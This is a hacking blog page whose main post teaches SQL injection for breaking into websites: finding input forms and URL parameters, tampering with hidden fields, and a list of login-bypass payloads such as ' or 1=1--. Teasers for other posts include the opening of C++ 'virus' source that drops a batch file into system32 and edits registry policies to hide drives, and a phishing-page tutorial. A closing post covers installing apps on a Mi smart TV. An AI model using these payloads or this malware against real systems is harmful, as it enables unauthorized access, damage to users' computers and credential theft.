Basic concept of SQL injection

-
Website Hacking is dream of every new hacker and SQL injection is one of the most favourite hacking attack of a hacker. Today we are going to learn some basic concept of SQL injection


>> Section 1 – SQL Injection (Basics):-
I have to try my best to explain the meaning of SQL Injection and how it works.

What is SQL Injection?

Basically SQL Injections or simply called Structured Query
Language Injection is a technique that exploits the loop hole in
the database layer of the application. This happens when user
mistakenly or purposely(hackers) enters the special escape
characters into the username password authentication form or in
URL of the website. Its basically the coding standard loop hole.
Most website owners doesn't have proper knowledge of secure
coding standards and that results into the vulnerable websites.
For better understanding, suppose you opened a website and went
to his Sign in or log in page. Now in username field you have
entered something say Techwhoopers and in the password box you
pass some escape characters like ',",1=1, etc... Now if the website
owner hasn't handled null character strings or escape characters
then user will surely get something else that owner never want
their users to view.. This is basically called Blind SQL.

Requirements for SQL Injection:
____________________________
1. You need a web browser to open URL and viewing source codes.

2. Need a good editor like Notepad ++ to view the source codes in
colored format so that you can easily distinguish between the
things.

3. And very basic knowledge of some SQL queries like SELECT,
INSERT, UPDATE, DELETE etc..

What you should look into website to detect
is it vulnerable to SQL injection attack or
not?

First of all you can hack those websites using SQL injection hacks
that allows some input fields from which can provide input to
website like log in page, search page, feedback page etc.
Nowadays, HTML pages use POST command to send parameters
to another asp/aspx page. Therefore, you may not see the
parameters in the URL. However, you can check the source code
of the HTML, and look for "FORM" tag in the HTML code. You
may find something like this in some HTML codes:

< f o r m action=login.aspx method="post" >
< i n p u t type="text" name="username" value="xyz">
< /f o r m >
You see?? Everything between the < f o r m > and < / f o r m > parameters
contains the crucial information and
can help us to determine things in more detailed way.

There is alternate method for finding vulnerable website,
the websites which have extension ASP, ASPX, JSP, CGI or PHP
try to look for the URL's in which parameters are passed. Example
is shown below:
http://xyz.com/login.asp?id=10

Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--.
Now in the above URL id is the parameter and 10 is its value. So
when we pass hi'or1=1-- as parameter the URL will look like this:
http://XYZ.com/login.asp?id=hi'  or 1=1--
You can also do this with hidden field, for that you need to save
the webpage and had to made changes to URL and parameters
field and modify it accordingly. For example:

< F O R M action=http://xyz.com/login. asp
method=p o s t >
< i n p u t type=hidden name=abc value="hi' or 1=1--">
< / F O R M >

If your luck is favoring you, you will get the login into the website
without any username or password.
.
But why ' or 1=1-- ?
Take an asp page that will link you to another page with the
following URL:

http://xyz.com/search.asp?category=sports

In this URL 'category' is the variable name and 'sports' is it's
value.
Here this request fires following query on the database in
background.

SELECT * FROM TABLE-NAME WHERE category='sports'

Where 'TABLE-NAME' is the name of table which is already
present in some database.
So, this query returns all the possible entries from table 'search'
which comes under the category 'sports'.

Now, assume that we change the URL into something like this:
http://xyz.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which
fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or
1=1--'

The query should now select everything from the 'search' table
regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the
query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single
hash "#".
However, if it is not an SQL server, or you simply cannot ignore
the rest of the query, you also may try
' or 'a'='a

It should return the same result.
Depending on the actual SQL query, you may have to try some of
these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='


To learn more about SQL and SQL commands Contact Us or Email Us at Techwhoopers

Comments

Post a Comment

Popular posts from this blog

Create a simple and working virus using C++

-
Image
Creating virus may be funful for someone. this post is actually for them who want to create a virus by self. Before going to start i want to let you know that for creating virus you must have a c++ ccompiler except Turbo C++ . If you don't have any download Dev C++ from here or you can download CodeBlocks also Now Let's start copy this code in your C++ compiler. May be there are some syntax mistake due to line break. Please correct it. Now Compile and build an .exe file. #include<windows.h> # include <fstream.h> #include<iostream.h> #include<string.h> #include<conio.h> int main() { ofstream write("C:\\WINDOWS\\system32\\HackingStar.bat"); /*opening or creating new file with .bat extension*/ write<<"REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write<<"REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Window\\
Read more

What is Phising? Learn to Create a Phishing page

-
Image
Now a days, Hacking is fantasy of every newbies. Hacking is not a bed roses , you will need good skill and practice in order to hack anything. Newbies downloads several software and spoil their several hours but at last they got nothing. They think they can hack just using a free and easily available open software. No way.. If you want to be a successful hacker you need to learn basic techniques first. Phishing is one of the most useful techniques for hacking. Note: ONLY FOR EDUCATIONAL PURPOSE What is Phishing?   Phishing is the process of setting up a fake website or webpage that look like original webpage . Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows: A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually
Read more

How to install YouTube, Netflix in Mi Smart Tv

-
Image
Hello Friends, Welcome to Techwhoopers, Your Own Technical Helpdesk.. Friends, Recently A Chinese company Xiomi Mi launched 32 inch and 43 inch smart TVs. But users are complaining about missing YouTube and Play Store. Actually, MI TV support YouTube but this app is not pre installed. You can install YouTube and all other apps by following steps: STEP 1: Download Aptiod TV from here and transfer into a flash drive or Pen drive. STEP 2: Install Aptoid Tv in your Mi Tv STEP 3: Search For YouTube or any other apps STEP 4: Install Youtube or the apps you want Enjoy ;) How to increase picture quality in MI SMART TV > Go to Setting > Set Brightness to 75% > Set Picture Mode to Sport Your picture Quality will to a little more enhanched. Please subscribe and share Techwhoopers
Read more